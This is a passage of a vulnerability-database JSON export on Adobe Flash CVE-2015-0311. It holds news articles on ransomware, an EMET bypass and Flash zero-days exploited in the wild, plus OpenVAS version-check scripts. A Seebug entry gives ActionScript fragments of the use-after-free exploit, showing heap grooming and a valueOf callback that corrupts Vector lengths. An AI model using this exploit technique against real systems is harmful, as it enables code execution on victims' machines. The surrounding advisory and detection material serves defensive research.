extensions associated with video games are targeted by this variant, in addition to images, documents, iTunes files and more. A number of popular single-player games including Call of Duty, Minecraft, Half Life 2, Elder Scrolls, Skyrim, Assassin\u2019s Creed and others are affected, as are online games such as World of Warcraft, Day Z and League of Legends, as well as a number of EA Sports, Valve and Bethesda games. Steam gaming software is also in the crosshairs, Bromium said.\n\n\u201cEncrypting all these games demonstrates the evolution of crypto-ransomware as cybercriminal target new niches. Many young adults may not have any crucial documents or source code on their machine (even photographs are usually stored at Tumblr or Facebook), but surely most of them have a Steam account with a few games and an iTunes account full of music,\u201d Kotov wrote. \u201cNon gamers are also likely to be frustrated by these attacks if they lose their their personal data.\u201d\n\nSome of the files the variant goes after are often impossible to restore; those include user profile data, saved games, in-game maps and mods, Kotov wrote.\n\nThe Bromium advisory goes into more detail about command and control communication and encryption mechanisms. The experts advise gamers to back up their files on an external hard drive that is not connected to the Internet.\n\n\u201cAs more file categories are infected, a broader audience is affected,\u201d Kotov said. \u201cThe attackers are also getting better at incorporating BitCoin code directly into their projects, which isn\u2019t a good sign.\u201d\n", "modified": "2015-04-13T17:19:09", "published": "2015-03-12T15:57:56", "id": "THREATPOST:531D9E2E2960D83A1A334DF82AE3EA2E", "href": "https://threatpost.com/cryptolocker-variant-coming-after-gamers/111611/", "type": "threatpost", "title": "CryptoLocker Variant Coming After Gamers", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:06", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311", "CVE-2017-11882"], "description": "Backwards compatibility, a necessary evil for Microsoft in its need to support so many legacy applications on Windows, may be its undoing as researchers have found a way to exploit this layer in the operating system to bypass existing mitigations against memory-based exploits.\n\nSpecifically in this case, researchers at Duo Security have slid past Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, a suite of more than a dozen freely available mitigations against memory attacks that include ASLR, DEP, Export Address Table Filtering, Heapspray Allocation, and return-oriented programming mitigations.\n\nThe soft spot, the researchers said, is the Windows on Windows, or WoW64, Windows subsystem that allows 32-bit software to run on 64-bit Windows machines. A sizeable sample of Duo customers shows some disturbing numbers in terms of vulnerable users. For example, 80 percent of browsers in the researchers\u2019 sample size were 32-bit processes executing on a 64-bit host running WOW64, putting them all at risk.\n\nEMET remains a viable protection for Windows users, one that Microsoft has marketed many times as a temporary stopgap between the disclosure of a zero-day vulnerability and the availability of a patch. But in the WoW64 example, EMET can be completely bypassed.\n\n\u201cIt\u2019s a classic, recurring problem that we see a lot in Windows where there\u2019s a lot of legacy stuff to support, so you build a feature to facilitate that transition to run older software,\u201d said Darren Kemp, security researcher at Duo Security. \u201cBut the side effect is that as the OSes are improving, yes you\u2019re getting more and more security features, but they all maintain this specific compatibility layer and it\u2019s in a path that created some interesting bypass scenarios for various security features like DEP and ASLR. We\u2019re demonstrating that, but with an entirely different mechanism.\u201d\n\nDuo said it reached out to Microsoft with its research and exploit, which was acknowledged. The issue, however, would likely require significant re-architecting of Windows with regard to the support of 32-bit applications on 64-bit systems, which is unlikely.\n\n\u201cThe subsystem results in some limitations, by design. And those limitations have a negative impact on security software,\u201d Kemp said. \u201cIt\u2019s simply a limitation of Windows. It\u2019s not an inherent vulnerability, but it essentially makes the mitigation ineffective in essentially all cases of 32-bit software running on 64-bit version of Windows.\u201d\n\nKemp and his colleague and senior security researcher Mikhail Davidov modified an existing exploit for a patched Adobe Flash use-after-free vulnerability (CVE-2015-0311) to get past EMET. They explain in a [paper](<https://www.duosecurity.com/blog/wow64-and-so-can-you>) released today that 32-bit applications under WoW64 behave unlike they do in 32-bit systems; the processor\u2019s ability to switch between execution modes at runtime opens up a number of exploit options for attackers.\n\nFrom the paper:\n\n> \u201cOne of the most important limitations imposed by the WoW64 subsystem is that it makes it very difficult for security software to effectively hook low-level functionality from userland. Windows does not provide any \u2018official\u2019 mechanism for inserting 64-bit modules into 32-bit processes. A significant portion of the API functionality a piece of security software (i.e. EMET) would want to monitor is implemented in the 64-bit copy of ntdll.dll (process creation, module loading, etc.).\u201d\n\nThey explain that an attacker would need to transition the processor to long mode, resolve the location of 64-bit modules and functions within them and overcome the limitations of available 64-bit APIs in order to avoid the function hooks used by security software. EMET hooks into ntdll.dll, a library that provides low-level functionality that applications use. Two copies of the library exist on both sides of this process, 32-bit and 64-bit, however, they researchers explain that on the 64-bit side none of the hooks are in place.\n\n\u201cAll of those mitigations don\u2019t exist there,\u201d Kemp said. \u201cWe force the transition and then when everything executes, none of those hooks are present.\u201d\n\n[EMET bypasses](<https://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437/>) are not new. In the last 18 months, there have been a number of high-profile exploits, most of them from the white-hat realm, that have illuminated some shortcomings in the valuable [Windows security feature](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>). Black hats too have taken an interest in EMET; the Operation Snowman APT campaign, for example, contained a module that ran a check to [determine whether EMET was running on the compromised host](<https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/>) and then made a decision as to whether to execute the remainder of the attack.\n\n\u201cBecause Microsoft is so focused on not breaking legacy technology\u2014and from an enterprise point of view, that\u2019s a good thing\u2014it enabled these kinds of attacks,\u201d Davidov said. \u201cEven though most people are running a 64-bit version of the OS these days, you end up with a ton of 32-bit applications on the machine, which means you end up with the WoW64 subsystem on there as well, which enables EMET to be bypassed.\u201d\n", "modified": "2015-11-06T14:03:07", "published": "2015-11-02T15:29:12", "id": "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "href": "https://threatpost.com/latest-emet-bypass-targets-wow64-windows-subsystem/115224/", "type": "threatpost", "title": "Latest EMET Bypass Targets WoW64 Windows Subsystem", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:30", "bulletinFamily": "info", "cvelist": ["CVE-2015-0310", "CVE-2015-0311"], "description": "**UPDATE**\u2013Adobe has released an emergency update for Flash to address a zero-day vulnerability that is being actively exploited. The company also is looking into reports of exploits for a separate Flash bug not fixed in the new release, which is being used in attacks by the Angler exploit kit.\n\nThe vulnerability that Adobe patched Thursday is under active attack, but Adobe officials said that this flaw is not the one that security researcher Kafeine said Wednesday was being used in the Angler attacks.\n\n\u201cAdobe has released security updates for Adobe Flash Player for Windows, Macintosh and Linux. These updates address a vulnerability that could be used to circumvent memory randomization mitigations on the Windows platform,\u201d Adobe said in its [advisory](<http://helpx.adobe.com/security/products/flash-player/apsb15-02.html>). \n\n\u201cAdobe is aware of reports that an exploit for CVE-2015-0310 exists in the wild, which is being used in attacks against older versions of Flash Player. Additionally, we are investigating reports that a separate exploit for Flash Player 16.0.0.287 and earlier also exists in the wild.\u201d\n\nThe patch for Flash comes just a day after Kafeine disclosed that some instances of the Angler exploit kit contained an exploit for a previously unknown vulnerability in the software. Adobe officials said Wednesday that they were investigating the reports. Kafeine initially saw Angler attacking the latest version of Flash in IE on Windows XP, Vista, 7 and 8, but said the exploit wasn\u2019t being used against Chrome or Firefox.\n\nOn Thursday he said on Twitter that the group behind Angler had changed the code to exploit Firefox as well as fully patched IE 11 on Windows 8.1. The Flash zero-day exploit is being used to install a version of the Bedep malware, which is used in ad fraud campaigns.\n\n\u201cOne last bad news : Windows 8.1 Internet Explorer 11 fully updated is now owned as well,\u201d Kafeine [said](<https://twitter.com/kafeine/status/558272193797566464>).\n\nAdobe late on Thursday said that it plans to release a patch for the second zero-day flaw in Flash\u2013the one being used by the Angler exploit kit\u2013next week, but did not specify an exact release date. The vulnerability affects the latest versions of Flash.\n\n\u201cA critical vulnerability (CVE-2015-0311) exists in Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,\u201d Adobe said in an advisory.\n\n\u201cWe are aware of reports that this vulnerability is being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8 and below.\u201d\n\nAngler is among the more dangerous exploit kits being used right now and the group behind the kit often has exploits for Flash vulnerabilities within days of a new Adobe patch being published. Adobe officials did not say whether there is an update in the works for the zero-day vulnerability.\n\n_This article was updated on Jan. 22 to include the information about the patch timing for the second Flash flaw._\n", "modified": "2015-01-23T16:53:56", "published": "2015-01-22T11:43:46", "id": "THREATPOST:FE4322E23327181E988F841DEFCCC3C6", "href": "https://threatpost.com/adobe-patches-one-zero-day-in-flash-still-investigating-separate-vulnerability/110586/", "type": "threatpost", "title": "Adobe Patches One Zero Day in Flash, Still Investigating Separate Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:26", "bulletinFamily": "info", "cvelist": ["CVE-2013-0311", "CVE-2015-0311", "CVE-2015-0313"], "description": "The little-known HanJuan exploit kit is delivering attacks targeting the most recent [Adobe Flash Player zero-day vulnerability](<http://threatpost.com/another-flash-zero-day-emerges/110786>). Adobe has yet to produce a patch for the flaw, which researchers at Trustwave said is a use-after-free vulnerability.\n\nThe flaw is the third to hit Flash in the last two weeks; the previous two have been patched by Adobe. A request to Adobe for comment on a patch for this bug was not returned in time for publication.\n\nAdobe confirmed the vulnerability on Monday affecting Flash version 16.0.0.296 and earlier for Windows. The exploitation technique used against this vulnerability, CVE-2015-0313, is similar to another zero-day exploit being served up in the Angler exploit kit, leading Trustwave to surmise it could be the same group behind both vulnerability discoveries and exploits. That [flaw was patched](<http://threatpost.com/adobe-begins-auto-update-patching-of-second-flash-player-zero-day/110640>) last week.\n\n\u201cThe vulnerability is a use-after-free vulnerability caused by a bug in how Flash handles the FlashCC (previously Flash Alchemy) \u2018fast memory access\u2019 feature (domainMemory), when the last is used by flash Workers (Flash threads),\u201d Trustwave said in its [report](<http://blog.spiderlabs.com/2015/02/a-new-zero-day-of-adobe-flash-cve-2015-0313-exploited-in-the-wild.html>) published yesterday.\n\nFrench researcher Kafeine, who found the Flash exploit in Angler, said there seems to be a strong connection between these exploits and the criminal gang behind Angler, which is also delivering Bedep click-fraud malware, and Reveton ransomware.\n\n\u201cWhy you don\u2019t hear that much about ([HanJuan](<http://www.malwaresigs.com/2013/10/14/unknown-ek/>)) is because the redirection chain has really strong filtering on the traffic to avoid most data centers (researchers using VPNs or virtual private servers to analyze malware and exploits),\u201d Kafeine told Threatpost.\n\nKafeine said the payload delivery is \u201cfileless\u201d and uses similar encryption (Xtea) as the Angler exploit; the exploit is dropping Bedep click-fraud malware, similar to CVE-2015-0311, he added.\n\nBoth this exploit and the CVE-2013-0311 exploit gain access to memory using a heap spray technique, Trustwave said. Trustwave said it was able to reproduce an exploit in its lab, and shared that process in its report.\n\nResearchers said the processes under attack support multi-threading in Flash, and the means in which data and objects are shared in memory. Within Flash, it is possible, Trustwave said, to access process memory using fast memory access, or ActionScript, which is achieved by setting memory data to a predefined ByteArray. Trustwave explained that if that ByteArray is freed by another thread, the domainMemory object will hold a pointer to freed memory.\n\n> The Hanjuan Exploit Kit is delivering exploits against the latest Flash zero day. via @Threatpost\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Flatest-flash-0day-under-attack-possible-ties-to-group-behind-angler-ek%2F110847%2F&text=The+Hanjuan+Exploit+Kit+is+delivering+exploits+against+the+latest+Flash+zero+day.+via+%40Threatpost>)\n\n\u201cSuch a condition is a security risk and is usually classified as a use-after-free vulnerability. Using the reference to a freed memory area, it is possible to use/access the heap memory block directly,\u201d Trustwave said. \u201cThe exploit uses heap spraying to fill this freed memory with Vector Objects and corrupt the size of a given vector setting it to a very large size. This corrupted Vector will later be used to access the entire memory of the browser process and to gain code execution over the machine.\u201d\n\nAdobe on Monday posted an [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-02.html>) on CVE-2015-0313, and said it was being [exploited in drive-by downloads and malvertising attacks](<http://threatpost.com/another-flash-zero-day-emerges/110786>). Some big sites were delivering malicious ads redirecting to the exploits, including DailyMotion, Wowhead, Answers.com, and Engage:BDR, among others. Adobe said attackers\u2019 exploits were targeting Windows 8.1 computers and below running Internet Explorer or Firefox.\n\nThis announcement came on the heels of two other warnings from Adobe regarding zero days in Flash. The more serious of the two was being delivered by the Angler Exploit Kit, and was discovered by Kafeine. That exploit used [multiple layers of obfuscation to hide the exploit](<http://threatpost.com/analysis-of-flash-zero-day-shows-layers-of-obfuscation/110674>) from detection.\n", "modified": "2015-04-13T17:21:31", "published": "2015-02-04T10:03:57", "id": "THREATPOST:598790503ACCB1E7323D4862D42346C2", "href": "https://threatpost.com/latest-flash-0day-under-attack-possible-ties-to-group-behind-angler-ek/110847/", "type": "threatpost", "title": "Third Adobe Flash 0Day Under Attack in HanJuan Exploit Kit", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:31:07", "description": "<p>\u8fd9\u4e2a\u6f0f\u6d1e\u548c Flash \u7684 ByteArray \u6210\u56e0\u7c7b\u4f3c\uff0c \u90fd\u662f\u8c03\u7528\u4e86 Clasz.valueOf() \u53c2\u6570\u5f15\u53d1\u7684 uaf \u547d\u4ee4\u6267\u884c</p><p>Vulcan \u5728\u7b2c\u4e00\u65f6\u95f4\u8fdb\u884c\u4e86\u5206\u6790\uff0c\u57fa\u4e8e\u8be5\u62a5\u544a(1)\u8fdb\u884c\u8bf4\u660e\uff1a</p><pre class=\"lang-js\" data-lang=\"js\">// try to allocate two sequential pages of memory: [ matrix ][ MyClass2 ]\r\n\r\nfor(i=20; i < alen; i+=6){\r\n\r\na[i] = new Class2(i);\r\n\r\nfor(j=i+1; j < i+5; j++) \r\n\r\n a[j] = new ConvolutionFilter(14,15); // ConvolutionFilter \u5728\u8fd9\u91cc\u521b\u5efa\r\n\r\na[i+5] = new Class2(i+5);\r\n\r\n}</pre><pre class=\"lang-js\" data-lang=\"js\">var m:Array = new Array(bLen);\r\n\r\nm[0] = new Clasz;\r\n\r\nm[1] = m[0];\r\n\r\n// \u8bbe\u7f6e matrix\r\ntry { filter.matrix = m; } catch (e:Error){}<br></pre><p>\u8fd9\u91cc\u6709\u4e00\u4e2a\u5173\u952e\u70b9\uff0cfilter.matrix \u88ab\u8d4b\u503c\u4e3a m\uff08\u7c7b\u578b\u662f Array\uff09\uff0c\u800c Array m \u7684\u7b2c\u4e00\u4e2a\u5143\u7d20\u662f\u4e00\u4e2a Clasz \u7c7b\uff0c\u800c Clasz \u7c7b\u5b9a\u4e49\u4e86 valueOf \u65b9\u6cd5\uff0c\u8fd9\u4e2a valueOf \u662f\u6f0f\u6d1e\u89e6\u53d1\u7684\u5173\u952e\u70b9\uff1a<br></p><p>3. \u5728 Clasz \u7684 valueOf \u51fd\u6570\u4e2d\uff0c\u8bbe\u7f6e matrixX\uff1a </p><pre class=\"lang-js\" data-lang=\"js\">filter.matrixX = 15; // reallocate filter matrix, \u6267\u884c\u5b8c\u6bd5\u540e ConvolutionFilter \u5185\u90e8\u7684\r\n // \u4e00\u4e2a float \u6570\u7ec4 (matrixArray) \u5c31\u4f1a\u88ab\u91ca\u653e, \u800c\u7ecf\u8fc7 valueOf() \u4e4b\u540e\r\n // \u5df2\u91ca\u653e\u7684 matrixArray \u8fd8\u4f1a\u7ee7\u7eed\u4f7f\u7528, \u5e76\u4e14\u5f80\u91cc\u9762\u5199\u5165\u6570\u636e\r\n // \u4ece\u800c\u9020\u6210\u4e86 use after free.\r\n</pre><p>\u53ef\u4ee5\u770b\u5230 valueOf \u51fd\u6570\u4e2d\uff0c\u5728\u8bbe\u7f6e\u4e86filter.matrixX \u4e4b\u540e\uff0c\u5206\u914d\u4e86\u4e00\u7cfb\u5217\u7684 Vector<uint>\uff0c\u8fd9\u4e9bVector\u5c31\u662f\u7528\u6765\u5360\u7528\u91ca\u653e\u540e\u7684 matrixArray \u7684\u5185\u5b58\u7684\u3002</p><p>\u8fd9\u6837\u5f53\u7a0b\u5e8f\u7ee7\u7eed\u5f80\u88ab\u91ca\u653e\u540e\u7684 matrixArray \u91cc\u5199\u6570\u636e\u65f6\uff0c\u5b9e\u9645\u4e0a\u662f\u5728\u5f80 Vector \u5bf9\u8c61\u91cc\u9762\u5199\u6570\u636e\uff0c\u4ece\u800c\u8fbe\u5230\u4fee\u6539 Vector \u957f\u5ea6\u5b57\u6bb5\u7684\u76ee\u7684\u3002</p><p>\u53c2\u8003\u94fe\u63a5: </p><p>(1) <a href=\"http://blogs.360.cn/blog/hacking-team-part2/\" target=\"_blank\">Hacking Team \u653b\u51fb\u4ee3\u7801\u5206\u6790 Part 2</a></p><p>(2) <a href=\"http://drops.wooyun.org/papers/5446\" target=\"_blank\">Exploiting CVE-2015-0311(\u8d85\u8be6\u7ec6)</a> </p><p>(3) <a href=\"http://drops.wooyun.org/papers/5460\" target=\"_blank\">Exploiting CVE-2015-0311, Part II: Bypassing Control Flow Guard(\u8d85\u8be6\u7ec6)</a></p>", "published": "2015-07-08T00:00:00", "type": "seebug", "title": "Adobe Flash Player Convolution Filter UAF \u547d\u4ee4\u6267\u884c", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0311"], "modified": "2015-07-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89240", "id": "SSV:89240", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "openvas": [{"lastseen": "2020-01-31T18:37:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851013", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851013", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2015:0163-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851013\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 16:43:41 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0311\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2015:0163-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to version 11.2.202.440 (bsc#914463,\n APSA15-01, CVE-2015-0311).\n\n An update of flashplayer (executable binary) for i386 is currently not\n available and was thus disabled.\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0163-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.440~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.440~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.440~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310850973", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850973", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2015:0151-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850973\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 15:19:15 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0311\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2015:0151-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to 11.2.202.440 (bsc#914463, APSA15-01,\n CVE-2015-0311).\n\n More information can be found at the linked vendor advisory.\n\n An update of flashplayer (executable binary) for i386 is currently not\n available. Disabled!\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0151-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.440~31.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.440~31.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:12:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "description": "This host is installed with Adobe Flash\n Player and is prone to unspecified arbitrary code execution vulnerability.", "modified": "2019-07-17T00:00:00", "published": "2015-01-27T00:00:00", "id": "OPENVAS:1361412562310805261", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805261", "type": "openvas", "title": "Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805261\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-01-27 16:19:35 +0530 (Tue, 27 Jan 2015)\");\n script_name(\"Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to unspecified arbitrary code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to some unspecified\n error and double-free flaw that is triggered as user-supplied input is not\n properly validated.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player through version\n 11.2.202.438 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.440 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62432\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n script_xref(name:\"URL\", value:\"http://www.rapid7.com/db/vulnerabilities/adobe-flash-apsb15-03-cve-2015-0312\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.440\"))\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: 11.2.202.440\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "description": "This host is installed with Adobe Flash\n Player and is prone to unspecified arbitrary code execution vulnerability.", "modified": "2019-07-17T00:00:00", "published": "2015-01-27T00:00:00", "id": "OPENVAS:1361412562310805260", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805260", 